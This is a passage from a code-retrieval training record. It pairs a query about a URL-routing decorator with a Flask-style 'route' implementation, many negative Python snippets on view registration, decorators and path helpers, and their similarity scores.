else:\n return os.path.join(\n self.destdir,\n self.package_install_space(package).lstrip(os.sep))", "def package_metadata_path(self, package=None):\n profile_path, _ = metadata.get_paths(self.workspace, self.profile)\n if package is None:\n return os.path.join(profile_path, 'packages')\n return os.path.join(profile_path, 'packages', package.name)", "def path_for_import(name):\n return os.path.dirname(os.path.abspath(import_module(name).__file__))", "def module_path():\n from sys import path\n from os import getcwd\n from os.path import basename,exists\n from inspect import getmodulename,getfile\n from logging import warn\n # 'getfile' retreives the source file name name compiled into the .pyc file.\n pathname = getfile(lambda x: None)\n if exists(pathname): return pathname\n # The module might have been compiled on a different machine or in a\n # different directory.\n pathname = pathname.replace(\"\\\\\",\"/\")\n filename = basename(pathname)\n dirs = [dir for dir in [getcwd()]+path if exists(dir+\"/\"+filename)]\n if len(dirs) == 0: warn(\"pathname of file %r not found\" % filename)\n dir = dirs[0] if len(dirs) > 0 else \".\"\n pathname = dir+\"/\"+filename\n return pathname", "def 
get_root_directory() -> str:\n return \"{}/../\".format(get_cur_directory(__file__))", "def menpowidgets_src_dir_path():\n # to avoid cluttering the menpowidgets.base namespace\n from pathlib import Path\n import os.path\n\n return Path(os.path.abspath(__file__)).parent", "def get_module_path(module):\n return pathlib.Path(os.path.dirname(os.path.abspath(inspect.getfile(module))))", "def _package_name(root_path, path):\n if not _under(path, root_path):\n raise ValueError('\"%s\" is not a subpath of \"%s\"' % (path, root_path))\n return path[len(root_path) + 1:].replace(os.sep, '.')", "def get_project_root():\n return str(Path(__file__).parent.parent)", "def get_project_root():\n return str(Path(__file__).parent.parent)", "def cwd_for_path(self, path):\n os_path = to_os_path(path, self.root_dir)\n # in the case of notebooks and kernels not being on the same filesystem,\n # walk up to root_dir if the paths don't exist\n while not os.path.isdir(os_path) and os_path != self.root_dir:\n os_path = os.path.dirname(os_path)\n return os_path", "def get_project_root():\n return Path(__file__).parent.parent", "def get_project_root() -> Path:\n return Path(__file__).parent.parent", "def get_project_root() -> Path:\n return Path(__file__).parent.parent", "def get_project_root() -> Path:\n return Path(__file__).parent.parent", "def get_project_root() -> Path:\n return Path(__file__).parent.parent", "def _default_target(package):\n return package[package.rfind('/')+1:]", "def from_cwd(root, path):\n return normpath(join(root, normpath(path)))", "def get_kernel_path():\n path = \"/\".join(os.path.dirname(os.path.realpath(__file__)).split('/')[:-1])\n return path+'/src/'", "def module_directory(file_path):\n return os.path.dirname(os.path.realpath(file_path))", "def get_package_list_filepath(*args, **kwargs):\n logger.debug(\"Getting the package file filepath\")\n user = path.expanduser(\"~\")\n filepath = f\"{user}/.gitget.yaml\"\n logger.debug(\"Filepath found\")\n return filepath", "def _find_reporoot(self, reporoot_opt, relnotessubdir_opt):\n reporoot = os.path.abspath(reporoot_opt)\n # When building on RTD.org the root directory may not be\n # the current directory, so look for it.\n try:\n return repo.Repo.discover(reporoot).path\n except Exception:\n pass\n\n for root in ('.', '..', '../..'):\n if os.path.exists(os.path.join(root, relnotessubdir_opt)):\n return root\n\n raise Exception(\n 'Could not discover root directory; tried: %s' % ', '.join([\n os.path.abspath(root) for root in ('.', '..', '../..')\n ])\n )", "def path():\n # Exclude path to this script from path.\n this_file = os.path.realpath(__file__)\n this_path = os.path.dirname(this_file)\n return os.pathsep.join(p for p in sys.path if p != this_path)" ]
[ "0.7696517", "0.7690331", "0.74621767", "0.7385542", "0.735868", "0.7233731", "0.7224455", "0.68511313", "0.6845975", "0.6718231", "0.66957945", "0.6695532", "0.66928047", "0.6686478", "0.66783273", "0.65905523", "0.6572487", "0.6560498", "0.6526827", "0.6526827", "0.6525203", "0.65170616", "0.6510319", "0.6487505", "0.648562", "0.64829934", "0.64775175", "0.64556175", "0.64322776", "0.6381957", "0.63780195", "0.6335252", "0.6333008", "0.63011646", "0.6300961", "0.6298814", "0.6293719", "0.6278339", "0.62765765", "0.6273744", "0.62718314", "0.62627965", "0.62395483", "0.62352", "0.62332356", "0.6225714", "0.62240404", "0.6195693", "0.6185059", "0.6177714", "0.6148088", "0.6137461", "0.6134477", "0.6132164", "0.6131857", "0.61088246", "0.61063015", "0.6105787", "0.6095807", "0.6092792", "0.608952", "0.60860425", "0.60587615", "0.60545486", "0.60382974", "0.600438", "0.5999292", "0.59979856", "0.59859246", "0.59421027", "0.59337723", "0.593262", "0.5930776", "0.59291756", "0.5919531", "0.5918613", "0.5901341", "0.5892536", "0.58823645", "0.58763677", "0.5872903", "0.58725756", "0.5870687", "0.58701676", "0.5858995", "0.58476835", "0.58476835", "0.58415174", "0.5839047", "0.5837748", "0.5837748", "0.5837748", "0.5837748", "0.58343273", "0.5829569", "0.5825423", "0.5823092", "0.58229464", "0.5822014", "0.5819711" ]
0.7207799
7
Opens a resource from the application's resource folder. To see
def open_resource(self, resource): if pkg_resources is None: return open(os.path.join(self.root_path, resource), 'rb') return pkg_resources.resource_stream(self.package_name, resource)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def open_resource(self, filename):\n assert self.current_run is not None, \"Can only be called during a run.\"\n return self.current_run.open_resource(filename)", "def getResource(self, file_name):\n path = os.path.join(os.path.dirname(__file__), \"resource\", file_name)\n return open(path)", "def open_resource(self, resource):\n # type: (Text) -> BinaryIO\n # This deliberately raises FileNotFoundError instead of\n # NotImplementedError so that if this method is accidentally called,\n # it'll still do the right thing.\n raise FileNotFoundError", "def load_resources(resource_filename):", "def get_resource_path():\n return os.path.join(os.path.dirname(__file__), \"resources\") + os.path.sep", "def load_resource(resource):\n if resource not in RES_PATHS:\n raise Exception(f\"Unknown resource: {resource}\")\n\n with open(RES_PATHS[resource], 'r', encoding='utf8') as f:\n data = json.load(f)\n\n return data", "def getResource(resname, loc = None):\n # check the HOME for personal config file\n prv_filename = os.path.join(os.getenv(\"HOME\"), \".aphla\", resname)\n if os.path.exists(prv_filename):\n return prv_filename\n elif loc and resource_exists(loc, resname):\n # use the config within distribution\n return resource_filename(loc, resname)\n else:\n return None", "def open_error_resource():\n need('Estr', 1, filename=\"errors.rsrc\", modname=__name__)", "def load_resource(resource_path): # pragma: NO COVER\n resource_content = pkg_resources.resource_string(__name__, resource_path)\n return resource_content.decode(\"utf8\")", "def load_resource(path: str, encoding: str = None) -> TextIO:\n components = path.rsplit(\":\", 1)\n try:\n if len(components) == 1:\n return open(components[0], encoding=encoding)\n else:\n bstream = pkg_resources.resource_stream(components[0], components[1])\n if encoding:\n return TextIOWrapper(bstream, encoding=encoding)\n return bstream\n except IOError:\n pass", "def load_resource(self, resource_path):\n resource_content = pkg_resources.resource_string(__name__, resource_path)\n return resource_content.decode(\"utf8\")", "def resource(self, *path):\n # TODO(vadimsh): Verify that file exists. Including a case like:\n # module.resource('dir').join('subdir', 'file.py')\n return self._module.RESOURCE_DIRECTORY.join(*path)", "def open_pathname(pathname, verbose=0):\n try:\n refno = Res.FSpOpenResFile(pathname, 1)\n except Res.Error, arg:\n if arg[0] in (-37, -39):\n # No resource fork. 
We may be on OSX, and this may be either\n # a data-fork based resource file or a AppleSingle file\n # from the CVS repository.\n try:\n refno = Res.FSOpenResourceFile(pathname, u'', 1)\n except Res.Error, arg:\n if arg[0] != -199:\n # -199 is \"bad resource map\"\n raise\n else:\n return refno\n # Finally try decoding an AppleSingle file\n pathname = _decode(pathname, verbose=verbose)\n refno = Res.FSOpenResourceFile(pathname, u'', 1)\n else:\n raise\n return refno", "def _resource(path): # pragma: NO COVER\n data = pkg_resources.resource_string(__name__, path)\n return data.decode(\"utf8\")", "def load_resource(self, path):\n data = pkg_resources.resource_string(__name__, path)\n return data.decode(\"utf8\")", "def resource_path(name):\n return os.path.join(\n os.path.dirname(__file__), 'images', 'resource', name)", "def load_resource(resource_path): # pragma: NO COVER\n resource_content = pkg_resources.resource_string(__name__, resource_path)\n return unicode(resource_content)", "def open(self):\n if System.is_linux():\n subprocess.run([\"xdg-open\", self.__path])\n elif System.is_mac():\n subprocess.run([\"open\", self.__path])\n elif System.is_windows():\n if self.__len_prefix:\n from pysaurus.core.native.windows import get_short_path_name\n\n path = get_short_path_name(self.standard_path)\n if path is None:\n raise core_exceptions.NoShortPathError(self.__path)\n logger.debug(f\"AbsolutePath: opening Windows short path {path}\")\n else:\n path = self.__path\n FileSystem.startfile(path)\n else:\n raise core_exceptions.UnsupportedSystemError(System.platform())\n return self", "def read_file(rel_path, *args, **kwargs):\n path = os.path.join(os.path.dirname(__file__), \"resources\", rel_path)\n with open(path, *args, **kwargs) as _file:\n return _file.read()", "def OpenReadMe():\n\tos.startfile(ReadMeFile)\n\treturn", "def get_resource(resource_path):\n\n return pkg_resources.resource_string(\n cloudify_agent.__name__,\n os.path.join('resources', resource_path)\n )", "def resources(filename):\n return send_from_directory(\"resources\", filename)", "def resource(request):\n local_path = os.path.dirname(request.module.__file__)\n return lambda *args: get_resource_path(args, local_path)", "def open( self ):\n pass", "def resource_pathname(pathname, verbose=0):\n try:\n refno = Res.FSpOpenResFile(pathname, 1)\n Res.CloseResFile(refno)\n except Res.Error, arg:\n if arg[0] in (-37, -39):\n # No resource fork. 
We may be on OSX, and this may be either\n # a data-fork based resource file or a AppleSingle file\n # from the CVS repository.\n try:\n refno = Res.FSOpenResourceFile(pathname, u'', 1)\n except Res.Error, arg:\n if arg[0] != -199:\n # -199 is \"bad resource map\"\n raise\n else:\n return refno\n # Finally try decoding an AppleSingle file\n pathname = _decode(pathname, verbose=verbose)\n else:\n raise\n return pathname", "def get_resource(res_name, res_type=\"icons\"):\n own_path = os.path.dirname(__file__)\n resource_path = os.path.abspath(os.path.join(own_path, os.pardir, \"resources\", res_type))\n return os.path.join(resource_path, res_name)", "def open_file(self, relpath, mode):\n path = os.path.join(self.topdir, relpath)\n try:\n return open(path, mode)\n except IOError as error:\n if error.errno == errno.ENOENT:\n raise PathNotFoundError(path)\n raise", "def open(self) -> None:", "def open(self) -> None:", "def open(self) -> None:", "def open_program(path):\r\n os.startfile(path)", "def open(self):\n pass", "def open(self):\n pass", "def open(self):\n pass", "def open(self):\n pass", "def open(self):\n pass", "def open(self):\n pass", "def open(self):\n pass", "def get_resource(self):\n from rowgenerators import parse_app_url # Here, to break an import cycle\n\n self._resource = self._downloader.download(self.inner)\n\n\n ru = parse_app_url(self._resource.sys_path,\n downloader=self.downloader,\n scheme_extension=self.scheme_extension,\n **self.frag_dict)\n\n\n return ru", "def _open(args):\n p = Path(args.uri)\n if p.is_file():\n uri = p.resolve().as_uri()\n else:\n # hope the user has provided a valid URI\n uri = args.uri\n\n print(f'opening {uri}')\n args.service.open(uri)", "def load(filename):\n path = Path(__file__).parent / \"resources\" / filename\n with path.open() as file:\n return lkml.load(file)", "def getResource(self):\n pass;", "def open_file(self):\n try:\n filename = tkFileDialog.askopenfilename()\n file = open(filename)\n self.image_window.status.config(text='Opened: ' + filename)\n return file\n except:\n self.status.config(text='You fool!')\n tkMessageBox.showwarning(\"Open file\",\n \"Cannot open file \" + filename)\n return None", "def _localfile(name):\n return os.path.abspath(resource_filename(__name__, name))", "def open(self):\r\n pass", "def open(self):\r\n pass", "def get_resource(filename: str, path: str | None = None) -> str:\n root = Path(__file__).parent\n full_path = root if path is None else root / Path(path)\n return str(full_path / filename)", "def test_static_package_resource(self):\n resource = StaticResource('pyramid_webpack:jinja2ext.py')\n import pyramid_webpack.jinja2ext\n with resource.open() as i:\n self.assertEqual(i.read(),\n inspect.getsource(pyramid_webpack.jinja2ext))", "def file_to_open(self, title='Open file..', initial_folder=None, extension=\"All files (*.*)\", datafolder=None):\n pass", "def open_file(file_name):\n pass", "def open_file(self):\n if not self.loaded:\n self.load()\n\n # call a plugin action to perform the open action\n from cviewer.plugins.cff2.actions.actions import OpenFile", "def open (self, path, mode):\r\n pass", "def smart_open(filename, *args, **kwargs):\n return LOADERS.get(os.path.splitext(filename)[1], open)(filename, *args, **kwargs)", "def resource_path(relative_path):\n base_path= getattr(sys,'MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n return os.path.join(base_path, relative_path)", "def open(self):", "def test_resource_path(self):\n\n # Without arguments\n resources_root_path = 
os.path.abspath(os.path.join(\n MY_DIRECTORY, '..', '..', 'resources'\n ))\n self.assertEqual(resources_root_path, paths.resource())", "def open(self, mode: str):\n return open(self.path, mode)", "def open(self) -> None:\n pass", "def open(self, mode='r'):\r\n return open(self.strpath, mode)", "def get_resource(self, rsc_path):\n\n\t\ttry:\n\t\t\tfrom pkg_resources import resource_filename\n\t\t\treturn resource_filename(__name__, rsc_path)\n\t\texcept ImportError:\n\t\t\treturn os.path.join(os.path.dirname(__file__), rsc_path)", "def open_file():\n filepath = filedialog.askopenfilename(initialdir = \"./\",title = \"Seleccionar archivo\",filetypes = ((\"xls files\",\"*.xls\"),(\"xlsx files\",\"*.xlsx\")))\n if not filepath:\n return\n\n window.title(filepath)\n lbl_url[\"text\"] = filepath\n btn_generate['state'] = 'normal'", "def open_app(self, event=None):\n if not self.ask_save():\n return\n default_path = os.path.dirname(common.root.filename or \"\") or self.cur_dir\n infile = wx.FileSelector(_(\"Open file\"),\n wildcard=\"wxGlade files (*.wxg)|*.wxg|wxGlade Template files (*.wgt)|*.wgt|\"\n \"XML files (*.xml)|*.xml|All files|*\",\n flags=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST, default_path=default_path)\n if not infile: return\n self._open(infile)", "def openInputFile(self):\r\n\r\n filename = self.ui.inputFilenameLineEdit.text()\r\n if not os.path.isfile(filename):\r\n QMessageBox.warning(self, \"Cannot open input file\", \"The input file does not exist\")\r\n return\r\n QDesktopServices.openUrl(QUrl.fromLocalFile(filename))", "def getResource(self, QQuickWindow, *__args): # real signature unknown; restored from __doc__ with multiple overloads\n pass", "def resource_path(self, resource):\n # type: (Text) -> Text\n # This deliberately raises FileNotFoundError instead of\n # NotImplementedError so that if this method is accidentally called,\n # it'll still do the right thing.\n raise FileNotFoundError", "def resourcePath(relative, dirname=\"data\"):\n # first look in pyinstaller bundle\n if hasattr(sys, \"_MEIPASS\"):\n path = os.path.join(sys._MEIPASS, dirname)\n \n else:\n # then look in py2app bundle\n path = os.environ.get(\"RESOURCEPATH\", None)\n if path is None:\n # then look in source code directory\n path = os.path.join(RESOURCE_BASE, dirname)\n \n path = os.path.join(path, relative)\n \n return path", "def _open(self, mode=b'r'):\n return self.opener(self.filename, mode=mode)", "def resource_path(relative_path):\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\")\n\n return os.path.join(base_path, relative_path)\n\t# \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\n\t# base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n\t# return os.path.join(base_path, relative_path)", "def resource_path(relative_path):\r\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\r\n return os.path.join(base_path, relative_path)", "def resource_path(relative_path):\n # base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n # return os.path.join(base_path, relative_path)\n return os.path.join(os.path.dirname(os.path.abspath(__file__)), relative_path)", "def open_file(path, config):\n\n return fopen(normalize_path(path, config))", "def getFile(filename):\n filename = os.path.join(os.path.dirname(__file__), filename)\n return open(filename, 'r')", "def getFile(filename):\n filename 
= os.path.join(os.path.dirname(__file__), filename)\n return open(filename, 'r')", "def OpenReadMe():\n location = os.path.join(os.path.dirname(__file__), \"README.txt\")\n os.startfile(location)", "def resource_path(relative_path):\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n return os.path.join(base_path, relative_path)", "def resource_path(relative_path):\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n return os.path.join(base_path, relative_path)", "def resource_path(relative_path):\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n return os.path.join(base_path, relative_path)", "def resource_path(relative_path):\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n return os.path.join(base_path, relative_path)", "def resource_path(relative_path):\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n return os.path.join(base_path, relative_path)", "def resource_show(resource_id, extra_args=None, cibfile=None):\n return item_show(\n item=\"resource\", item_id=resource_id, extra_args=extra_args, cibfile=cibfile\n )", "def __init__(self, resource):\n if resource:\n self.__resource = str(os.path.realpath(str(resource)));\n else:\n self.__resource = '';", "def openFile(self):\r\n from SXM import FileIO,Data\r\n fname = str(QFileDialog.getOpenFileName(self.widget,self.tr(\"Open File\"), \\\r\n \".\",FileIO.getFilterString(types=(Data.Image,))))\r\n if len(fname) > 0:\r\n root, ext = os.path.splitext(fname)\r\n self.statusBar().showMessage(self.tr(\"Loading data: %1\").arg(fname),2000)\r\n image = FileIO.fromFile(fname)\r\n image.load()\r\n imwin = ImageWindow(self,image)\r\n self.Images.append(imwin)\r\n self.updateImageList()\r\n imwin.windowModality = False\r\n imwin.show()", "def get_recipe_resource():\n return os.getenv(\"DKU_CUSTOM_RESOURCE_FOLDER\")", "def open_file(path):\n if platform.system() == \"Windows\":\n os.startfile(path)\n elif platform.system() == \"Darwin\":\n subprocess.Popen([\"open\", path])\n else:\n subprocess.Popen([\"xdg-open\", path])", "def resource_path(self, relative_path):\r\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\r\n return os.path.join(base_path, relative_path)", "def resource_path(self,relative_path):\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\\\\Visual_Ressources\\\\\"+self.language+\"\\\\\") \n # \".\"\n # 'Content\\\\Back_End\\\\'\n return os.path.join(base_path, relative_path)", "def __init__(self, resource_path):\n self.resource_path = resource_path", "def open_file(self):\n filepath = askopenfilename(filetypes=[(\"Image Files\", (\"*.jpg\", \"*.png\")), (\"All Files\", \"*.*\")])\n if not filepath:\n return\n return filepath", "def __init__(self, basedir=None):\n # ------------------------------------------------------------------------\n super(Resources, self).__init__()\n self.xInitialize(basedir or \"resources\")", "def get_recipe_resource():\n return os.getenv(\"SKU_CUSTOM_RECIPE_RESOURCE_FOLDER\")", "def open_script(script_path):\n pass", "def resource_string(self, path):\n\t\tdata = pkg_resources.resource_string(__name__, path)\n\t\treturn data.decode(\"utf8\")", "def start_file(filename):\n from spyderlib.qt.QtGui import QDesktopServices\n from spyderlib.qt.QtCore import QUrl\n\n # We need to use setUrl instead of setPath 
because this is the only\n # cross-platform way to open external files. setPath fails completely on\n # Mac and doesn't open non-ascii files on Linux.\n # Fixes Issue 740\n url = QUrl()\n url.setUrl(filename)\n return QDesktopServices.openUrl(url)", "def open_file(filename, mode='rb'):\n path = os.path.join('fixtures', filename)\n if 'tests' in os.listdir('.'):\n path = os.path.join('tests', path)\n return open(path, mode=mode)", "def open_jpi_source_read(file_name):\n\t# change directory\n\tra_to_jpid()\n\t# open the file\n\tsource = open(file_name, \"r\")\n\t# return to starting direcotyr\n\tjpid_to_ra()\n\t# return the open file\n\treturn source", "def resource_path(relative_path) :\n\n try :\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except :\n base_path = os.path.abspath(\".\")\n return os.path.join(base_path, relative_path)", "def resource_path(relative_path):\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\n path = os.path.join(base_path, relative_path)\n return path", "def open(self):\n raise NotImplementedError", "def open(self):\n raise NotImplementedError", "def read(resource, package='loopslib.resources', **kwargs):\n result = dict()\n f = resources.open_text(package=package, resource=resource)\n\n # This addresses an issue where dealing with a python 'str' type fails\n # yaml.constructor.ConstructorError: could not determine a constructor for the\n # tag 'tag:yaml.org,2002:python/name:builtins.str'\n if resource == 'arguments.yaml':\n result = yaml.load(f, Loader=yaml.Loader)\n else:\n result = yaml.safe_load(f)\n\n f.close()\n\n LOG.debug('Read resource file {package}/{resource}'.format(package=package.replace('.', '/'), resource=resource))\n\n return result" ]
[ "0.7365257", "0.73252803", "0.67678213", "0.6268737", "0.61023885", "0.60719913", "0.6015069", "0.59758013", "0.5959422", "0.59363925", "0.5917066", "0.5907269", "0.59051013", "0.5904808", "0.58840156", "0.5865891", "0.5858449", "0.58112895", "0.5795447", "0.5792268", "0.5791022", "0.5787568", "0.5750105", "0.57261926", "0.5709553", "0.57030255", "0.56809735", "0.5621488", "0.5621488", "0.5621488", "0.56075656", "0.56023335", "0.56023335", "0.56023335", "0.56023335", "0.56023335", "0.56023335", "0.56023335", "0.56007546", "0.55962825", "0.5589403", "0.55559903", "0.5551328", "0.5550957", "0.5539461", "0.5539461", "0.55270374", "0.55246097", "0.5513168", "0.55088806", "0.5486922", "0.5486334", "0.54716927", "0.5467547", "0.54553264", "0.54508674", "0.54498434", "0.5446999", "0.5442967", "0.5442753", "0.5422208", "0.54085463", "0.54032004", "0.5397368", "0.5395845", "0.53754425", "0.5372919", "0.5370937", "0.5359869", "0.53588635", "0.53447443", "0.5336905", "0.5336905", "0.53325504", "0.5332529", "0.5332529", "0.5332529", "0.5332529", "0.5332529", "0.53217816", "0.5319944", "0.53168356", "0.53046757", "0.5291121", "0.528795", "0.5278879", "0.5273897", "0.52709365", "0.5270187", "0.5263022", "0.5262923", "0.526268", "0.525975", "0.5256857", "0.52554065", "0.52488905", "0.5244738", "0.52375525", "0.52375525", "0.5230388" ]
0.6912169
2
A decorator that is used to register a view function for a given URL rule.
def route(self, rule, **options): def decorator(f): self.add_url_rule(rule, f.__name__, **options) # register the URL routing rule self.view_functions[f.__name__] = f # update the view_functions mapping defined earlier as {} return f return decorator
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_view( *args, **kwargs ):", "def decorate(func):\n from aha.dispatch.router import get_router\n r = get_router()\n r.connect(None, path, controller = func, **params)\n return func", "def decorator(self, decorator: Route.Decorator):\n pass", "def _wrapped_view(request, *args, **kwargs):\n return view_func(request, *args, **kwargs)", "def user_view_for(anon_view_func):\n\tdef decorator(view):\n\t\tanon_view_func.user_func = view\n\t\treturn view\n\treturn decorator", "def view(self, **options: Any) -> Callable:\n\n def decorator(f):\n rule = \"/\"\n endpoint = options.pop(\"endpoint\", f.__name__)\n self.add_url_rule(rule, endpoint, f, **options)\n return f\n\n return decorator", "def dajaxice_register(*dargs, **dkwargs):\r\n\r\n if len(dargs) and not dkwargs:\r\n function = dargs[0]\r\n dajaxice_functions.register(function)\r\n return function\r\n\r\n def decorator(function):\r\n @functools.wraps(function)\r\n def wrapper(request, *args, **kwargs):\r\n return function(request, *args, **kwargs)\r\n dajaxice_functions.register(function, *dargs, **dkwargs)\r\n return wrapper\r\n return decorator", "def decorator(request, *dargs, **dkwargs):\n _set_language_by_user(request)\n return view_func(request, *dargs, **dkwargs)", "def view(*args, **kwargs):\n return mapped_method()", "def route(self, route: str) -> Callable:\n\n def decorator(f: Callable) -> Callable:\n \"\"\"Decorates the function.\"\"\"\n self.routes[route] = f\n\n return f\n\n return decorator", "def register_view(self, viewfunc, url_rule=None) :\n\n\t\tviewid = View.parse_id(viewfunc, self.settings.VIEW_ROOT)\n\t\t\n\t\tif viewid not in self.views :\n\t\t\t# Add view if not exists\n\t\t\tv = View(\n\t\t\t\tid = viewid,\n\t\t\t\tviewfunc = viewfunc,\n\t\t\t\turl_rule = url_rule,\n\t\t\t)\n\t\t\tself.views[viewid] = v\n\n\t\telse :\n\t\t\t# Update view if exists\n\t\t\tv = self.views[viewid]\n\t\t\tv.viewfunc = viewfunc\n\n\t\t\tif url_rule is not None :\n\t\t\t\tv.url_rule = url_rule\n\n\t\treturn v", "def expose(path=None, **kw):\n def decorate(function):\n endpoint = function.__name__\n kw.setdefault('endpoint', endpoint)\n view_map[endpoint] = function\n # Introspect rule path from function name and arguments.\n if path is None:\n inferred_path = '/' + function.__name__.replace('_', '/')\n args, _, _, defaults = inspect.getargspec(function)\n if args:\n if defaults:\n args = args[:-len(defaults)]\n inferred_path += '/<' + '>/<'.join(args) + '>'\n else:\n inferred_path = path\n rule = Rule(inferred_path, **kw)\n url_map.add(rule)\n function._routing_rule = rule\n return function\n\n if callable(path):\n # decorate() assumes \"path\" is a string or None, we set it to the\n # latter to force auto-pathing.\n function = path\n path = None\n decorator = decorate(function)\n decorator.__name__ = function.__name__\n return decorator\n\n return decorate", "def register(self, *args):\n def decorate(f):\n if not len(args) == 1:\n full = f.__name__\n else:\n full = args[0]\n\n # Gather some informations about the arguments of the function, to\n # display them in help() and check for the min / max number of\n # arguments on call.\n spec = inspect.getargspec(f)\n fargs = spec.args if spec.args else []\n nbr_args = len(fargs)\n nbr_filled = len(spec.defaults) if spec.defaults else 0\n reqs = fargs[:nbr_args-nbr_filled+1]\n adds = fargs[nbr_args-nbr_filled+1:]\n\n info = {\n 'function' : f,\n 'required' : reqs,\n 'additional': adds,\n }\n\n self.actions[full] = info\n return f\n return decorate", "def register(self, *t):\n\n if 
isinstance(t, (list, tuple)):\n if len(t) == 1:\n\n def func(view):\n self.register(t[0], view)\n return view\n\n return func\n\n t = url(*t)\n\n self.append(t)", "def register_view(cls, app):\n view = cls.as_view(cls.endpoint)\n\n all_methods = set(cls.methods)\n if cls.rules is None:\n raise ValueError('No rules found for %r' % (cls, ))\n for rule, methods in cls.rules.items():\n rule_methods = set(methods) & all_methods\n if rule_methods:\n app.add_url_rule(rule=rule, view_func=view, methods=rule_methods)", "def custom_view_field(*args, **kwargs):\n\n def decorated_func(func):\n @wraps(func)\n def wrapper(*func_args, **func_kwargs):\n return func(*func_args, **func_kwargs)\n\n for k, v in kwargs.items():\n setattr(wrapper, k, v)\n return wrapper\n\n return decorated_func", "def register(app, fn):\n\n @functools.wraps(fn)\n def config_route(**kwargs):\n \"\"\"\n :param kwargs: str, id of existing entry\n :return: dict or exception\n \"\"\"\n\n return fn(app.config, **kwargs)\n\n app.route(*fn.route_args, **fn.route_kwargs)(config_route)", "def decorator(hookable: Union[Route, Callable]):\n nonlocal hook_function\n full_hook_function = hook_function\n\n async def hook_function(req, res, params):\n return await call_async(\n full_hook_function, req, res, params, *args, **kwargs\n )\n\n if isinstance(hookable, Route):\n route = hookable\n route.hooks[hook] = hook_function\n return route\n else:\n view: Callable = hookable\n\n @wraps(view)\n async def with_hook(self, req, res, **kw):\n if hook == BEFORE:\n await hook_function(req, res, kw)\n await call_async(view, self, req, res, **kw)\n if hook == AFTER:\n await hook_function(req, res, kw)\n\n return with_hook", "def delegate(func):\n @functools.wraps(func)\n def wrapped(self, *args, **kwargs):\n path = args[0]\n handler = self.router.match(func.__name__, path)\n return handler(*args, **kwargs)\n return wrapped", "def decorator():\n return _decorator", "def route(cls, url, method='GET'):\n def route_decorator(func):\n item = (url, method, func)\n cls._docoratedRouteHandlers.append(item)\n return func\n return route_decorator", "def decorator(func):\n\n pass", "def decorator(func):\n\t\treturn push_aspect(name or func.__name__, func)", "def wrapped(func):\n self.routes.append((path, {\n 'regex': re.compile('^' + re.sub(self._part_matcher,'(.*?)',path) + '$'),\n 'function':func,\n 'reqs':req,\n 'kwargs':kwargs,\n 'parts':parts_info,\n 'generate':generate\n }))\n\n return func", "def decorate(func, *args, **kws):\n def do_authenticate():\n \"\"\"\n A function to perform authentication\n every time decorated function is called.\n \"\"\"\n #try:\n if 1:\n if 'referer' not in self.session:\n path = urlsplit(self.request.url)[2]\n self.session['referer'] = path\n self.session.put()\n #except:\n # pass\n aobj = self.config.auth_obj()\n self.get_controller()\n auth_res = aobj.auth(self.controller, *args, **kws)\n if auth_res:\n return func(*args, **kws)\n aobj.auth_redirect(self.controller, *args, **kws)\n # clear controller for development environment.\n\n return do_authenticate", "def register():\n PLUGINS = dict()\n def decorator(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n value = func(*args, **kwargs)\n PLUGINS[func.__name__] = func\n return value\n return wrapper\n return decorator", "def route(self, path, **params):\n\n def decorate(func):\n \"\"\"\n A function returned as a object in load time,\n which set route to given url along with decorated function.\n \"\"\"\n from aha.dispatch.router import get_router\n r = 
get_router()\n r.connect(None, path, controller = func, **params)\n return func\n \n return decorate", "def decorator_register(func, name=None):\n self.register_command(func, name, description, show_if, args_opts)\n\n def func_wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return func_wrapper", "def setup_view(view, request=None, *args, **kwargs):\n view.request = request\n view.args = args\n view.kwargs = kwargs\n return view", "def _register_view(self, app, resource, *urls, **kwargs):\n endpoint = kwargs.pop('endpoint', None) or resource.__name__.lower()\n self.endpoints.add(endpoint)\n\n if endpoint in getattr(app, 'view_class', {}):\n existing_view_class = app.view_functions[endpoint].__dict__['view_class']\n\n # if you override the endpoint with a different class, avoid the collision by raising an exception\n if existing_view_class != resource:\n raise ValueError('Endpoint {!r} is already set to {!r}.'\n .format(endpoint, existing_view_class.__name__))\n\n if not hasattr(resource, 'endpoint'): # Don't replace existing endpoint\n resource.endpoint = endpoint\n resource_func = self.output(resource.as_view(endpoint))\n\n for decorator in chain(kwargs.pop('decorators', ()), self.decorators):\n resource_func = decorator(resource_func)\n\n for url in urls:\n rule = self._make_url(url, self.blueprint.url_prefix if self.blueprint else None)\n\n # If this Api has a blueprint\n if self.blueprint:\n # And this Api has been setup\n if self.blueprint_setup:\n # Set the rule to a string directly, as the blueprint\n # is already set up.\n self.blueprint_setup.add_url_rule(self._make_url(url, None), view_func=resource_func, **kwargs)\n continue\n else:\n # Set the rule to a function that expects the blueprint\n # prefix to construct the final url. 
